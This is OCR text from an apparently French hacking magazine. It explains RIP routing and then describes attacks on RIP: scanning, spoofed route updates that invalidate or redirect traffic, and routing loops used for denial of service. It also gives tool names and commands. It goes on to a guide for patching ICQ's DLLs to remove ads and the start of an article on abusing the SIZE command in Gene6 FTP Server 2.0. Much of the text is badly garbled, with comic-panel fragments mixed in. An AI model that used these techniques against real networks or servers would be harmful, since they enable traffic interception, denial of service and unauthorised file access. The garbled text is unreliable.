à ce Jour y est inscrite. 


Les routes vers les réseaux locaux directement connectés aux 
interfaces de À (dans notre tableau c1 dessus : AI et A2) sont 
toujours connues. Lecoût quileur est associéest lecoûtattribué par 
l'administrateur pour l'interface qui leur est connectée. 

En effet, chaque interface de À a un coût d'utilisation fixé par 
l'administrateur. Cecoût permet d'exprimer des préférences en terme 
de routage : il peut être préféré d'utiliser au maximum l'interface 
ethernet n°1 plutôt que la liaison spécialisée qui nous est factu- 
rée en fonction du volume de données transmises. On peut donc 
dire de manière approximative que au plus la valeur du coût 
associé à une interface sera élevée, au moins son utilisation sera 
souhaitée. 


Donc, comment tout cela fonctionne-t-1l pour donner un roûta- 
ge dynamique ? 


Prenons un scénario de simulation : le routeur À vient de reboo- 
ter. Sa table des vecteurs de distance ne contient que les entrées 
vers les réseaux AI et A2 immédiatement connectés à ses inter- 
faces : 


"pour aller de À vers At je passe directement par l'interface eth1, ce qui me coûte 3" 
"pour aller de À vers A2 je passe directement par l'interface eth?, ce qui me coûte 1" 


colt/métrique pour pe 
atteindre la dest 


3 
2 


192.168.13.254 4 


[3e | 
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* Ainsi on peut voir que l'administrateur a décidé que l'utilisation 


de l'interface ethernet n°1 coûte 3 alors que l'interface ethernet 
n°2 ne coûte que |. 


Il va annoncer sur toutes ses interfaces sa table de vecteurs de dis- 
tance en disant : 


A: "Je connais une route pour aller à A1 : elle coûte 3 !11" 
À: "Je connais une route pour aller à A2 : elle coûte 1 1!!!" 


Il va ensuite attendre les annonces de ses voisins immédiats (le 
système des vecteurs de distance est un protocole passif). jus- 
qu'à ce que son voisin B lui envoie lui même sa table de vecteurs 
par l'intermédiaire de l'interface ethernet n°1 de A en lui disant : 


B: "Je connais une route pour aller à B1 : elle coûte 1 11" 

B: "Je connais une route pour aller à C1 : elle coûte 2 {1!" 

B: "Je connais une route pour aller à D1 : elle coûte 3 1!!!" 

B: "Je connais une route pour aller à A1 : elle coûte 3!!!" (B connaît également le 
réseau A1 puisqu'ils sont tous les deux connectés à la même interface eth1 de A) 


À reçoit ce message et se rends compte qu'il y a trois destinations 
nouvelles. | 

Tout content, il rajoute ces trois réseaux à sa table de vecteurs. 
Le calcul des coûts finaux pour chacune de ces destinations se fait 
de la manière la plus simple par : 


coût_final_vers_X_par_ ethi = coût annoncé par _B_ vers X + Coût_utilisa- 
tion_interface_ eth1. par À; 

où X est soit A1, B1, C1 ou Di (les trois destinations qui viennent d'être annoncées 
par B). 


Pour ce qui est de la destination Al, A sait déjà l'atteindre…. 
Etant donné que la passerelle menant vers AI (@IP de B connec- 
téeaethl)est différente de la passerelle initialement connue 
(@IP de A/eth1), 1l va donc lui falloir comparer le coût calculé 
(3+3=6)aveclecoût initialement connu (=3), ce qui va donc l'ame- 
ner à ignorer cette route puisqu'elle est plus coûteuse. 

À sait d'où vient l'annonce de B (interface eth1) et il récupère 
l'@IP deB pour l'interfaceeth]1 en regardant l'@IP source du data- 
gramme qu'il vient de recevoir. 


Au final, voici le tableau que A a construit incluant chacune des 
destinations qu'il vient de découvrir : 


"Pour aller vers B1, je passe par l'interface eth1 de passerelle @B/eth1 et ça me 
coûte 1+3=4." 
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"Pour aller vers C1, je passe par l'interface eth1 de passerelle @B/eth1 et ça me 
Coûte 2+3=5." | | 

"Pour aller vers D1, je passe par l'interface eth1 de passerelle @B/eth1 et ça me 
coûte 3+3=6." | 


Imaginons maintenant que A reçoive l'annonce de D sur son 
interface ethernet n°2 (dont le coût a été fixé à 1): 


D: "Je connais une route pour aller à D1 : elle coûte 1 {1!" 
D: "Je connais une route pour aller à C1 : elle coûte 5!!!" 
D: “Je connais une route pour aller à B1 : elle coûte 3 11!" 
D: "Je connais une route pour aller à E1 : elle coûte 4 1!" 


La destination EI étant jusqu'à présent inconnue, A la rajoute 
dans sa table avec un coût de 4+1=S5. 


À connaît déjà une route pour aller vers les trois autres destina- 
tions mais, comme tout à l'heure, il va tout de même regarder 
pour chacune de ces destinations si le passage par eth2 lui permet 
de réduire le coût de transport : 


"Pour atteindre D1 par eth?, il m'en coûte 1+-1=2. C'est bien moins cher que par 
eth1 pour laquelle la même destination était atteinte avec un coût de 8 ! Je vire donc 
l'ancienne entrée et j'ajoute la nouvelle qui utilise eth2 et qui coûte 2." 

Pour atteindrg C1 par eth2, il m'en coûte 5+1=6. C'est trop cher : je connais déjà 
une route moins chère passant par eth1 qui ne me coûte que 5." | 
"Pour atteindre B1 par eth?, il m'en coûte 3+-1=4. C'est aussi bon marché que ce 
que je paye en passant par eth{, donc pas la peine de perdre du temps et du cpu à 
modifier la table : je garde la route vers B1 telle qu'elle est déjà inscrite dans la 
table." 


A la fin de notre scenario de simulation, voici le coût que À a 
associé à chacune des destinations qu'il a dans sa table de vec- 
teurs : 


“Pour aller vers B1, je passe par l'interface et de passerelle @B/elht et ça me 
“Parle vers C1, je passe par l'interface eth1 de passerelle @B/eth1 et ça me 
“are vers Di, je passe par l'interlace eth2 de passerelle @D/eth2 et ça me 
“Parle vers El, je passe par l'interface eth2 de passerelle @D/eth2 et ça me 


Lai 


CU 5. 


Notez que pour aller vers BI nous avons vu deux routes de même 
coût (=4). Dans ce genre de situation, c'est la première route à 
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avoir été inscrite (et donc la première annonce réalisée par un 
voisin de À de coût 4 et de destination B1) qui sera retenue pour 
le routage final. Si D s'était annoncé en premier (avant B), le 
chemin vers B1 passerait par l'interface ethernet n°2. 


En fait l'algorithme de Bellman-Ford peut se résumer ainsi : 

- À reçoit le vecteur de distance de B | 

- S1 ce vecteur contient une ou des destination(s) inconnues à A, 
À calcule leur coût final et les intègre 

- pour toutes les destinations déjà connues, 


* gi 18 coût calculé final est inférieur au coût déjà connu, 


À supprime l'entrée déjà connue et intègre la nouvelle entrée 
découverte dans le tableau 


* ginon si la destination, l'interface et la passerelle annoncées sont identiques à une 
entrée de la table, 


A met à jour lecoût associé danssa table (qu'ilsoit plus élevéounon) 
* sinon À conserve ce qu'il a déjà dans sa table 


On appelle temps de convergence 16 temps mis pour que l'en- 
semble de l'AS aitunmodèlederoutageunifiéetunétatstable. Cette 
convergenceest atteinte par les annonces de routessuccessives de tous 
les routeurs vers leurs voisins. 


Cesannoncesse fontdemanièrepériodiques etun système de timeout 
est appliqué sur les routes pour libérer les routes qui ne se sont 
plus annoncées depuis un certain temps. (nous allons développer ceci 
dans la présentation de RIP). ; 


L'algorithme de Bellman-Ford, utilisé par RIP et IGRP possède des 
problèmes de boucle bien connus (Countingto Infinity) que je ne 
détaille pasrier. 


b) Diffusing Update ALgorithm (DUAL) : 
a EL os propriétaire (beurk!) d'El- 


C'est ce protocole qui compte pour un demi. 

Grosso modo identique à Distance Vector avec la possibilité sup- 
plémentaire de filtrer lesanñonces pour des raisons desécuritéavant 
émission ou après réceptionoutes les routes qu'un routeur 
reçoit sont stockées dans la table et peuvent être exploitées en cas 










LA FUNESTE PRÉS 


IN ENCE TES EonN* 
EST À L'ŒUVRE } 


FORCES DE C'ORD 











de rupture de liaison ("Jayce, arrête de te battre avec les câbless!! 


c'est pas des monstro-plantes !"). 

Lorsqu'unetelleruptureest détectéeet quelerouteur ne possède aucu- 
neroutederechange, ilréclame demanière active à ses voisins lesroutes 
permettant d'atteindre la destination recherchée. De ce fait le 
temps de convergence du réseau est largement diminué. 


C) Link State : Algorithme de Dilkstre 


Je ne le détaille pas 1c1, on verra ça lorsqu'on traitera de OSPF et 
consorts. 


4 - Routing Information Protocol : 
the beginning of the fun :) 


Ce protocole pas tout jeune a été, si je me rappelle bien ma jeunesse, 
le premier protocole implémenté pour faire tourner du routage 
dynamique. La Request For Comment (RFC1058) que je tiens dans 
mes mains date de 1988, soit bien avant l'invasion de fenêtres ami- 
cales envers les utilisateurs. Donc c'est un protocole qui a l'âge de 
ses artères et qui a évolué en une version plus récente : RIPv2. Il uti- 
lise la technique du vecteur dedistancece qui fait qu'ilestsimpleà mettre 
en oeuvre et qu'il est adapté aux réseaux de petite/moyenne taille 
(les gros réseaux ne peuvent pas être gérés avec du RIP car il autori- 
se un maximum de 16 hops comme nous allons le voir plus loin). 
Voyons tout d'abord les particularités de RIPvl-et nous aborde- 
rons ensuite les modifications qui lui ont été apportées pour 
donner RIPv2 (tout ce qui n'a pas été modifié se retrouve donc 
dans la version 2 :). | 


a) RIPvi: RFC1058 


Ce protocole travaille en UDP sur le port 520. Si vous voulez le 
détecter, nmap saura vous aider (‘nmap -sU -p 520 
ADRESSE_DU_RESEAU. SCANNE ). Engénéralilest conseillé, 
lorsque l'on écrit des programmes de communication avec des rou- 
teurs RIP d'utiliser le port source 520 (certains routeurs fonction- 
nant en mode silencieux ne répondront pas si le port source n'est 
pas mis à 520...plus d'infos dans la RFC). La taille maximale d'un 
datagramme RIP ennecomptant paslesen-têtes IP et UDP est de 512 
octets (ce qui correspond à 25 routes annoncées) et il faudra utili- 
ser plusieurs datagrammes si on a beaucoup de routes à envoyer. 





© DEEMBRE200 
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Hop fun petit copier coller/traduction de la RFC : 


RAT RE À 
01234567890123456789012345678901 
commande version mis à zéro 
identif famille d'adresse mis à zéro 
adresse IP 
mis à zéro 
mis à zéro 
métrique 
{ 


Le 


La partie du datagramme depuis l'identifiant de la famille 
d'adresse jusqu'au champ métrique peut apparaître jusqu'à 25 
fois (c'est ce que je vous disais plus haut). 

Le champ "identifiant de la famille d'adresse" est là parce que, 
"en théorie", RIP gère différents types de réseau et ne se limite 
pas qu'aux réseaux IP Comme dit ce cher C. Hedrick, auteur de 
la RFC en question avec qui je joue au cricket tous le$ samedi, : 
"The address family identifier for IP 1s 2. None of the RIP 
implementations available to the author implement any other 
typeofaddress." C'est clair : mettez l'identifiant de la famille d'adres- 
se à 2 et travaillez en IP comme tout le monde ! | 
L'adresse [P est l'adresse Internet classiquesur doctetsenordreréseau. 


Les valeurs du champs commande peuvent être : 


1 - requête : réclame tout ou partie de la table de routage du 
destinataire 


2 - réponse : message contenant tout ou partie de la table de 
routage de l'expéditeur. 

Il peut être envoyé en réponse à une requête ou également être une 
mise à Jour ou un signe de vie généré par l'expéditeur. 
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3 - 5 : obsolète/réservé : on ignore. 

Toutes les 30 secondes tous les routeurs doivent envoyer en 
broadcast (donc à leurs voisins immédiats puisque les broadcast 

255.255.255.255 nepassent paslesrouteurs)sur toutesleursinter- 

faces leurs tables de vecteurs associant adresse IP destination (machi- 
‘ne ou réseau) à la métrique (le coût calculé). | 


La métrique est le coût calculé par l'expéditeur pour atteindre la 
destination spécifiée. La valeur envoyée va de 1 à 16. Pour éviter 
les boucles de routage et les problèmes inhérents au mécanisme 
Distance Vecteur que nous avons rapidement suggérés plus haut, 
toute route reçue avec une métrique de 16 indiquera que la desti- 
nation n'est pas accessible et l'annonce de cette destination ne 
devra donc pas être prise en compte dans la table de vecteurs 
(sauf pour supprimer cette route si elle existait dans notre table). 


Si le coût pour atteindre une destination donnée à changé, et si 
la table de vecteurs indique que pour atteindre cette destination 
on passait par l'interface et la passerelle par lesquelles on vient 
de recevoir les routes, le dernier coût annoncé pour cette destina- 
tion écrase le coût précédent dans la table. 


Tout cela vous rappelle quelque chose ? ben oui, c'est le mécanis- 
me que nous avons vu plus haut : l'annonce de sa table de vec- 
teurs à tous ses Voisins pOur que Ceux Ci puissent comparer ces 
informations avec leur propre table et éventuellement la mettre à 
jour siun nouveau chemin, un chemin moins coûteux, unesuppression 
de chemin ou une modif de coût sont notifiés. 


Tous les routeurs sont tenus d'annoncer leur table toutes les 30 
secondes. Si au bout de 180 secondes un routeur donné ne s'est 
pas manifesté (envoi de mise à jour ou d'annonce), les routes lui 
faisant référence sont considérées comme invalides par tous ses 
voisins (coût/métrique mis à 16). Au bout de 120 secondes après 
expiration de ce premier timeout, et s'il n'y a eu aucun signe de 
vie en provenance de cette passerelle, l'entrée correspondant à 
cette destination est carrément supprimée de la table de vecteurs 
des routeurs (libération de la place mémoire !).. 


Les champs marqués "mis à zéro" sont vérifiés et s'il l'un d'entre 
eux n'est pas à zéro, c'est le message entier qui sera ignoré. Si la 
version de RIP est supérieure à 1, les champs qui ne sont pas mis 
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à zéro sont quand même pris en compte (en fait les champs mis à 
zéro étaient destinés aux évolutions futures de nouvelles versions 
de RIP et devaient correspondre à des extensions). Si la version 
est O, le datagramme est ignoré. 


Tout ceci pourrait vous être utile si un jour vous vousamusez à coder 
vos propres datagrammes RIP.. Bon, je m'arrête là pour RIPvl1, 
je pense que ça donne uñe bonne vue d'ensemble du fonctionne- 
ment du protocole. Les plus pointilleux se référeront à la RFC :) 


Comme vous ayez pu le voir, aucun chiffrement n'est appliqué 
aux données transportées, tout circule en clair, aucun système 
d'authentification n'existe ce qui permet à n'importe qui de for- 
ger ses propres datägrammes RIP et de les envoyer à un routeur 
avec une adresse IP sourcespoofée… 


Voyons rapidement les modifications que RIPv2 a apporté à 
cette version ancestrale ! | 


b) RIPv2: RFC1723 


RIPv2 est compatible avec RIPv1efles deux versions peuvent 
cohabiter et communiquer). L'émission des annonces en broad- 
cast est abandonnée. On utilisemaintenant l'adresse multicast 
224.0.0.9.pourtoutes les diffustons vers les voisins, ce qui per- 
met de réduire l'encombrement du réseau par des trames broad- 
cast ((c) micrO$Oft :). 


Le paquet RIPv2 a un peu été modifié” 


l Î L 9 0 
01234562880123456788012345678801 


non utilisé 
route tay 


Commante Version 
identif famille d'adresse 
adresse IP 
- masque de (Sous) réseau 
@IP prochain routeur 
| métrique 


Les informations déjà présentes dans RIPVI n'ont pas changées 
de sens. Des extensions ont êté apportées, comme l'information 


de masque de sous-réseau qui manquait cruellement à RIPvlI et 


la possibilité d'annoncer une route pour un autre routeur ne 
gérant pas RIP (grâce au champ @IP durouteur suivant quicontient 
l'@IP du routeur à utiliser pour la destination annoncée). Si ce 
champ est à 0.0.0.0, onutilisera l'@IP source du datagramme comme 
passerelle vers la destination (comme dans RIPv1). 


Le Route Tag est là pour permettre une meilleure intéropérabili- 
té et une meilleure distinction des origines des routes (importa- 
tionet redistribution deroutes venant d'EGP ou d'OSPF par exemple). 
Le champ non utilisé doit être ignoré. 


RIPv2 implémenteun procédé d'authentificationévolutif(différentes 
techniques peuvent encore être proposées et implémentées dans les 
routeurs sans modification du protocole). Cette authentification 
est gérée par le premier bloc identifiant une route : la partie 
démarrant à identifiant de la famille d'adresse et se terminant avec 


“le champ métrique. Si le premier bloc de ce type d'un datagramme 


a son identifiant de famille de d'adresse égal à OxFFFF (tous les 
bits à 1), cela signifie qu'un procédé d'authentification identifié 
par le champ Route Tag est employé. Donc en fonction de la valeur 
du Route Tag de ce bloc, l'authentification sera de type différent : 


* Route Tag = 2 => authentification par mot de passe. Le 
mot de passe est contenu en clair dans la suite des octets du bloc 
en. cours (au maximum 16 caractères justifiés à gauche avec mise 
à 0 des octets non utilisés). 

. * Route Tag = 3 => authentification par mot de passe crypté 
par le système Message Digest 5 (utilisation d'une clé qui est le 
mot de passe et d'un identifiant de clé sur chaque routeur).Ce 
type d'authentification n'est apparemment supportée que par les. 
routeurs Cisco (grande majorité des routeurs en place sur le net). 


Tout datagramme reçu ne présentant pas le bon mot depassesera 1gno- 
ré par les routeurs se basant sur une authentification. Les routeurs 
tournant sous RIPvI traiteront les annonces RIPv2 sans prendre 
en compte ce champ d'authentification et ils resteront donc vulné- 
rables à un certain nombre d'attaques vraiment donc triviales. 


Le fait quel'authentification occupe la place d'uneannonce deroute, 
seulement 24 différentes routes pourront être annoncées dans un 
seul datagramme si l'option d'authentification est activée. 





| 5 - Rest In Peace : les attaques possibles sur 


‘1e protocole RIP 8p Le 


Bon, cette fois c'est fini pour de bon, on passe à la partie où on 
fait mumuse ;) | 

Tout d'abord, si vous souhaitez trouver les routeurs faisant tour- 
ner RIP sur votre réseau, utilisez le classique nmap : 


[take@shell]$ nmap -SÙ -p 520 adr_rezo a scanner 


Les machines dont leport UDP 520 sera marquécomme open feront 
tourner un process RIP 


Vous pouvez également utiliser l'outil protos fourni par phenoelit, 


avec plusieurs outils décrits plus bas, dans le package d'attaque 


Internetwork Routing Protocol AttackSuite (IR PAS) téléchargeable 
sur www.phenoelit.de. Cetoutil vousindiquequelssont les protocoles 
tournant sur une machine et peut donner des résultats faisant lar- 
gement penser à un routeur (tiré de la doc de l'outil) : 


10.1.1.1 may be running (did not neyate): 
ICMP 1Penc TOP 16P UDP GRE SWIPE MOBILE SUN-ND EIGRP 1PIP 


Si vous voyez apparaître RIP dans la liste, c'est que vous êtes bons ! :) 


Autonomous System Scanner (aka ASS;) peut également.vous 
aider à trouver des informations sur la métrique du réseau fai- 
sant tourner RIPv]. 

Si le routeur fait tourner la version 2 du protocole, les informations 
de masqué de réseau, de prochain saut ((@IP du prochain réseau), de 
route taget demétrique associées aux réponses obtenuesseront données. 
Il pourra également indiquer que l'authentification RIPv2 est 
activée, et si oui de quel type d'authentification il s'agit. Dans le 
cas d'une authentification par mot de passe en texte clair, ke mot 
de passe sera révélé (pratique :) 

Je n'ai pas pu tester ces outil car je ne dispose pas de routeurs sous 
la main (d'ailleurs, si vous en avez deux trois à me filer, vous avez 
monadresse;), donc désolé pour ceux quiauraient voulu voir desjolies 
lignes de commandes... Pour une fois, rtfm and do it yourself! 


Donc pour pouvoir exploiter les failles du protocole RIPilfautconnaître 
au maximum la topologie duréseauattaqué(lescommandesitraceet tctra- 
ce vous permettront d'explorer un peu les routes vers certaines desti- 
nations, et donc de mettre en évidence les routeurs intermédiaires). 
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Les outils rprobe et srip de Humble pourront également vous 
aider danscetterecherche (rprobe.cetsrip.csur google.fret vousserez 
fournis). rprobe vouspermet de réclamer les routes d'un routeur RIPv1 
ou RIPv2 (sansauthentification)et, siceluiciestmalconfiguréet vous 
répond, vous pourrez récupérer les résultats par : 


(root@clac# tepdump -vv -S 8000 up and port U20 


La meilleure façon de communiquer avec un démon RIP est de 
forger vous même vos propres paquets avec soft un programme 
fait maison, soit un générateur de paquets comme Nemesis-rip (il 
en existe en pagaille sur le net.….). 


Voilà pour la partie outils, voyons maintenant la théorie des attaques . 
possibles :  * : 
Les failles de la version 1 de RIP tiennent principalement au fait 
qu'aucune authentification n'est nécessaire pour-intervenir dans 
les discussions de routages dynamique. Unintruspeut donctrèsbien, 
depuis l'autre bout de la planète, modifier le routage RIP de 
votre réseau en spoofant l'@IP sourceetenayantune bonne connais- 
sance de sa topologie. Il pourra ainsi invalider toutes les routes 
d'un routeur RIP en annonçant des coûts exorbitants pour cha- 
cune d'entre elles par des messages de mise à jour. 

Ainsi si un message avec des valeurs d'@IP source et de destina- 
tion existantes dans là table d'un routeur arrive avec un coût dif- 
férent, la table est mise à jour avec le nouveau coût annoncé. 


L'attaquant connaissant tout ou partie du contenu de la table de 
routage d'un routeur peut doncinvalider certainesroutesenenvoyant 
un message de mise à jour provenant de l'IP de la passerelle en 
(@IP source, et la destination de la route qu'il veut casser, et avec 
un coût égal à 16. Le routeur en mettant à jour sa table invalide- 
ra le routage par cette passerelle vers cette destination jusqu'au 
prochain message de mise à jour provenant de la vraie passerelle (=> 
intérêt de répéter l'opération de manière régulière pour mainte- 
nir la route fermée malgré les annonces du vrai routeur). 


De la même façon, 11 sera possible de rediriger le trafic vers un 
routeur adjacent plus proche de nous avec la même opération, 
mais en annonçant cette fois ci une métrique minimale (de 1 par 
exemple). Lanouvelleroutesemblant êtrepluscourtesera alors prise 
en compte par le routeur attaqué. Cette opération répétée sur 
une chaîne de routeurs faisant tourner RIP peut amener les com- 
munications à passer par un routeur situé juste à coté de nous 
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(quenouspourronsalors contrôler de manière aisée par demultiples 
procédés d'alchimistes du 15°" siècle, ce qui nous permettra de 
lire les informations top secrètes routées jusqu'à nous ;) ! 


Des variantes existent permettant de créer des boucles de routage 
entre deux routeurs. Le routeur A considérera que la meilleure 
route pour atteindre le réseau X est d'envoyer le paquet à router 
vers le routeur B, et le routeur B sera persuadé que le routeur A 
est la meilleure passerelle pour atteindre le réseau X. Il s'en suit 
une boucle de routage entre deux routeurs (mais on peut faire la 
même chose sur plus de deux routeurs). Le champ Time To Live 
des paquets IP est heureusement là pour éviter que cette partie 
de ping pong dure éternellement, mais ce genre d'attaque peut 
amenèr un Déni de Service sur une liaison en raison de l'amplifi- 
cation importante et rapide du trafic sur le lien reliant A et B. 


Pour ce qui est de la version 2 du protocole, le problème principal 
est d'obtenir le mot de passe (si celui ci est utilisé !). Un sniffer fera 
‘ceci très bien si on a sur le réseau local un routeur qui parle le RIP 
mais cela peut poser problèmepour dessystèmeséloignés.. Pourcequi 
est du chiffrement MD, je n'ai pas effectué de recherches donc je 


Li 





n'ai aucune idée s1 1] s'agit d'un processus d'encryptage fort. Ceux 
quecet aspectintéresse pourront se référer à la RFC 2082 (RIP-2MD5 
Authentication) et envoyer un papier à HZV traitant du sujet ! 


Voilà pour ce premier cours sur RIP RIP est un protocole simple 
comparé à OSPE.. vous imaginez ce qui vous attend ! :/ J'espère que 
j'ai été assez clair et que vous avez compris le mécanisme ainsi que ses 
failles. Le routage est un processus extrêmement critique et il est 
important de maîtriser’ses concepts globaux et techniques lorsqu'on 
administre un réseau. Le choix de l'utilisation de tel ou tel protocole 
doit se faire en connaissance de cause, après analyse dés points forts 
et des faiblesses de chacun. Si vous souhaitez aller plus loin, allez 
récupérer les RFC citées plushaut (et d'autres traitant desmêmessujets) 
sur 1etf.org par ex. Les documents disponibles sur le site www.phe- 
noelit.de sont également extrêmement intéressants (ainsi que les 
outils qu'ils développent) etun passage par l'urlhttp://www.sans.org/info- 
secFAQ/threats/protocol_level.htm vous est vivement recommandé ! 
Je conclurais par la signature habituelle de FX (de Phenoelit) : 


Peace! 
UZY@hhwhh.com 





Résultat du concours MacHack : 


La question était : Comment localiser des fichiers ou des dossiers invisibles ? 


Abonnement a la clefau plus rapide sur Mac. 


À la finale vue nombre de réponse rapide set pas forcément précise et les réponses précise et pas rapide, le rédacteur en chef propose dans sa grande 
générosité | abonnement au plusrapider,et un Tshirt au plus précis, qui seront prévenus individuellement. 


Bravo tous les deux 

Le plus rapide, c'est Papyrus: 

Sa bonne réponse : il suffit de lancer Sherlock et 

de lui passer comme paramètre de recherche ce qui est invisible. 
Le tourest joué. 


Le plus précis; c'est Thunderangel : 


Sa bonne réponse : 
Avec mac Os 9 : 


Depuis le finder choisir le menu Fichier/ Rechercher, qui lance Sherlock, I&#821 7;outil de recherche intégré au système. 








SUR UNE PLACE AU'CHARME iMPA LPABLE 
QUE SE TROUVE LEUR DESTINATION 
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ATTENTION 





NB : Cette technique ne fonctionne pas sur icq 2001b. Autre 
chose : vous n'aurez plusaccès aux fonctions ICQ more 
put -ins et History 


Let: S po | 

Pour virer lapubsuricq,on vainterdire la mise à Jour automatique, 
supprimer les fichiers dil qui téléchargent, chargent et affichent 
la pub. et supprimer l’espace réservéaux pubs. C’est parti ! 


interdire la mise à jour automatique 
Pour supprimerlamise à joufautomatique d’icq, allez dans la 
base de registrezindaube (Exécuter >REGEDIT), allez dans 
HKEY_ CURRENT. 


USER\Sofware\Mirablis\u\DefaultPrels etmodifiez la valeur : 


de la chaîne nommée AUTO UPDATE par NO à la place de Yes 
| ou: ren. Rebootez votre ordi et passez à l’étapesuivante. 


les fichiers 


| bi süppressiondé ces fichiers va supprimendles pub et les nb 
cer par un bandeau gris ; Jusqu'ici 1] vaut encore mieux garder 
les pubsnais c'est pas fini. Allez dans le répertoire icq (par 
défaut : ‘c\Program Biles\Icq) et supprimez les fichiers suivants : 
icqateima32.dll" : téléchargement des pubs 

"icqateimgs2: dil'Æ chargement des pubs 

icqateres.dil" : affichage. des pubs 
Jévous conseille de faire une sauvegarde de ces fichiers avant de 
les supprimer: 


Supprimer le gris horrible 

Les espaces réservés aux bandeaux publicitaires sont maintenant 
sans pub et ont donc été remplacés par des bandeaux gris hor- 
ribles. On va donc voir comment virer cet espace devenu inutile 
est laid en modifiant icq à l’aide de "Resource Hacker" à télé- 
charger depuis http:// /ftp/tools/R k.z1 
Faites une sauvegarde d’ICQCore.dil avant de faire quoi que ce 
soit ! (ah non c’est vrai vous n’allez pas le faire donc j’ai rien 
dis). 





Ouvrez le fichier ICQCore.dil (emplacement par défaut : c:\Program 
Files\Icq) avec Resource Hacker et allez dans le répertoire Dialog 
puis dans les sous répertoires : 

2066 : fenêtre ICQ Chat 

2503 : fenêtre Incoming message 

2507 : fenêtre Message session 

2511 : fenêtre SMS 

2512 : fenêtre Send File Request 

2513 : fenêtre Send URL Message | 

2514 : fenêtre Envoi de requête et demande d’application 

2543 : fenêtre Contacts (dans la rubrique Send) 

2560 : fenêtre Rappel d'anniversaire 

2566 : fenêtre Initiating Message 

4501 : fenêtre Receiving/Sending File(s) To/F rom 


Pour virer la pub il faut modifier le logiciel, ce qu ‘interdit formellement Mirabilis ! 
Nous allons donc voir comment Supprimer la pub sans le mettre en pratique bien sur . 
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Dans chacun d’eux, vous verrez la ligne (exemple tiré du réper- 
toire 2507) : 


CONTROL", 1070, "{8F9012BA-F55B-1103-ADE7- eng)" 0x50000000, 
1, 165, 288, 38 


Seule la valeur 165 change selon le répertoire (ainsi que la valeur 
1070 mais ça nous intéresse pas). 

Ilfautalorsremplacer les 2 dernières valeur spar 0. Doncpour notre 
exemple, ça donnera : 


CONTROL", 1070, "{8FA012BA E56B-1103-ADE7-008027008F00}", Ox50000000, 
1, 165, 0, 0 


Il faut faire cette modification dans tout les répertoires. cités 
plus hauts. 
Et faites Compile Script après chaque modification’. 


On vamaintenanten finir en redimensionnant les fenêtres. Toujours 
dans lesmême répertoires, on vamodifier la première ligne descript. 
Dans notre exemple, on a : 2507 DIALOGEX 0, 0, 340, 163 


On va alors modifier la dernière valeur par 166 (165+1 : c’est la 
valeur avant celles que l’on a remplacées par 0 précédemment, 
que l’on ajoute à 1). 

Ca va donc donner : 2507 DIALOGEX 0, 0, 340, 166 


Idem, faites Compile Script après chaque modification’. 


Supprimer les 3 boutons 


Les trois grosboutons, la télé, l° enveloppe et la fleur, situéssous votre 
numéro 1cq sont inutiles, encombrants et ce que l’on vient de faire 
les a rendu inactifs. Pour les virer, il faut aller dans le répertoires. 
2168etremplacer les 2 dernières valeurs de la première ligne descript 
par 0. 

Avant : 2188 DIALOG 0, 0, 147, 16 


Après : 2168 DIALOG 0, 0, 0, 0 


Le mot de la fin 


Voilà, voussavez maintenant comment virer la pub de votreicq. Mais 
Si VOUS creusez un peu, vous trouverez vite comment le relooker, 
lui ajouter des fonction. 


PassRetrieve 00 


[as] 
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Hacking de serveur FTP as — 
- Démonstration d'une Stratégie 
d'attaque classique. 


dant, afin de préciser toute information, exécutez les étapes 


DISCLAIMER appropriées : | 
AIl your base are belong to us ! | - Localisation du service via un scan, des ports. Cela n'est pas 
nécessaire $1 la personne vous a donné les coordonnées 
Article succinct, précis, et qui, bien que ne exactes, ce qui est généralement le cas si vous y avez un 
! L L 


compte à VOUS. . | 


valant pas grand chose sur le plan technique, 


apportera beaucoup sur le plan méthodo- 2 - Connection via telnet <IP port>. Dans notre cas Cela 
logique. En effet le but est de demonter donne : telnet 192.168.0.2 21.‘ 
une attaque classique afin d'en comprendre 

a 2 3 - USER <login> ; PASS <pass>. Ces deux commandes sont 
la logique. J'en vois qui bavent déjà, alors nécessaires pour vous identifier sur le serveur. Sans ça, le 


je ne m'éterniserais pas plus. | | serveur refusera toutes commandes. Dansnotrecas Cela donne : 
USER strifouz (validation/touche Enter) PASS da 





4- Help ou ? vous donnera la liste des commandes disponibles. 
Conditions préalables : 


5 - STAT afficheralestatut client etserveur concernant laconnexion. 


= G6 FTP Server v 2.0 ou inférieur. Au delà,.le processus est Il permet de repréciser parfois la version du serveur. 
infaisable. LT 

- Connaître un moyen de Dos Windows par lecture de fichiers ou | 
derépertoires. Etape 2 : tests 

- Avoir un compte actif sur le système cible (anonyme ou spéci- 
fiqué) : | Une fois le serveur identifié, essayez d'utiliser une à une les com- 


mandes mises à votre disposition via la commande help. Afin que 
celles-ci ne soient pas trop floues, sachez qu'il existe sur internet 
Etape 1 : identification | des tutoriaux ou des fichiers d'aides concernant ce type de sys- 
tèmes. Voici la commande qui nous intéresse le plus : 
La prèmière étape est, et restera toujours, l'identification du sys- SIZE <paramètres>, qui sert à renvoyer la taille d'un fichier 
tème cible. à dont "paramètres" est l'adresse cible. Par exemple : SIZE c:\win- 
Sileserveur se présenteautomatiquement à vous, tantmieux. Cepen-  dows\telnet.exe 









Voici La VRAIE S.RV.U.C* ELLE EST 
QIEN DIFFÉRENTE DE CE QUE Nous 0, 


FAÎT CROIRE LES GÉNIES DE 
L'INFORMATIQUE QUI Nous 
GOUVERN ENT. ST 
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Environnement de travail : 


- Un poste serveur sous Windows 98 SE ; 

- Gene 6 FTP Server version 2.0 comme application serveur ; 
- Un poste client (telnet.exe) sous Windows2000 Pro ; 

- Un réseau actif entre client et serveur. 


Sur les versions non patchées de G6 FTP Server, il est possible d'utiliser la commande SIZE en-dehors du champ de limite spécifié par. 
la configuration serveur ! | 


Voici deux images qui témoignent du drame. 












(000002) 28/10/01 16:00:22 : shifouz (192,188.0.1] > asked ta change directory : 'C:Aägent +> Cägent\ «> Access allowed 
(000002) 29/10/01 36:00:22 > statous (192168.01)> 250 CWD command successtul /C/6gen" 5 current directory, 
(0000021 28/10/01 16:00:24 » shitous (19216801)> STAT | 

(000002) 28/10/01 16:00:24 - etitouz 11921880.) > 271: GB FTP Server status for stifouz ont 4. 
(O00002) 28/10/01 16:00:24 : stitouz 1192 188.0.1}> 211- {190 168 0.1:3106 <> 192 188 0.221) 

(000002) 28/10/01 16:00:24 » atifouz (192 168011» 211 

(0000027 28/10/07 16:00 24 : siifou2 1192 188 0115 211: Uplosded 0 Kbytes 

(090002) 28/10/01 16.00:24 : suitous (192 168 0 1} > 211: Dowrlosded : D Kbytes 

(0000021 28/10/01 16:00124 - strifoux 1192 168 0 11: 2 

